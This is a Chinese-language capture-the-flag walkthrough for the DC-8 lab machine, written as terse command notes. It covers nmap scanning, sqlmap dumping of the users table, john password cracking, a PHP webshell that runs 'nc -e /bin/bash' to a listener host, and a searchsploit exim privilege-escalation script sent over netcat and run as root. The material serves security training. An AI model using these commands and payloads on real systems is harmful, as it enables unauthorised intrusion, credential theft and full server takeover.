DC-8

#主机探测-端口扫描 

1
2
arp-scan -l
nmap -F -T4 -sS -sV 192.168.43.12

D8-a+nmap

#指纹识别-目录爆破 

1
2
whatweb http://192.168.43.12
dirsearch -u http://192.168.43.12

D8-what+dir

#Web界面-登录界面 

1
/user/login  --登陆界面

#URL存在Sql注入 

1
首页存在sql注入

D8-sql

#Sqlmap梭哈-

1
2
3
4
5
6
7
8
9

sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D --current-db

sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' --tables
字段名
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' --columns
字段
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C 'name,pass,uid' -dump
#得到的账密保存下来--->mima.txt

D8-sqlmap库

D8-字段

D8-字段名

D8-表

#john猜解密码 

1
john mima.txt   ---turtal

D8-保存并john

#web登录john-写马 

1
2
<?php system("nc -e /bin/bash 192.168.43.33 8888");?>
#返回主页提交表单

D8-webshell

#反弹shell 

1
2
3
kali:
nc -lvvp 8888
python -c "import pty;pty.spawn('/bin/bash')"

D8-反弹webshell

#SUID提权-exim 

1
2
3
find / -user root -perm -4000 -print 2>/dev/null
#存在exim
exim --version  --

D8-信息收集

#上传46996.sh到靶机 

1
2
3
4
5
searchsploit exim   ---找本地权限提升的脚本,也就是local privilege esc
cp /usr/....../46996.sh .
nc -lnvp 192.168.43.12 2333 < 46996.sh
靶机:
nc 192.168.43.33 2333 > 46996.sh

D8-exim+sploit

#运行脚本 

1
2
3
cd /tmp
chmod 777 46996.sh
./46996.sh -m netcat

D8-本地46996

​​D8-靶机46666

#FLAG​​

1
cat flag.txt

​![屏幕截图 2023-10-17 170619](assets/屏幕截图 2023-10-17 170619-20231017175605-fnb297h.png)​

​![屏幕截图 2023-10-17 170628](assets/屏幕截图 2023-10-17 170628-20231017175610-sq5jn7t.png)​